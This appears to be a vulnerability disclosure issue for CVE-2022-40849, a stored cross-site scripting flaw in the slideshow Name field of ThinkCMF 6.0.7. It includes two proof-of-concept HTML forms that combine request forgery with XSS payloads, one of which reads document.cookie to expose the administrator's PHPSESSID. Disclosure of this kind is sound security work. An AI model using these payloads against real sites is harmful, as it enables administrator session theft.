Headline
CVE-2022-40849: XSS Stored in the Slideshow Management component. · Issue #737 · thinkcmf/thinkcmf
ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploited this vulnerability could inject a Persistent XSS payload in the Slideshow Management section that execute arbitrary JavaScript code on the client side, e.g., to steal the administrator’s PHP session token (PHPSESSID).
ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field.
Here are the steps to reproduce the issue.
Note that with this issue a remote user can steal the administrator’s session cookie (PHPSESSID).
These are the PoCs I used.
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(0)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(document.cookie)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
Fig. 1: CSRF that contains an XSS payload
Fig.2: CSRF payload triggered
Fig. 3: XSS payload injected
Fig. 4: XSS triggered
Fig. 5: Reading the PHPSESSID cookie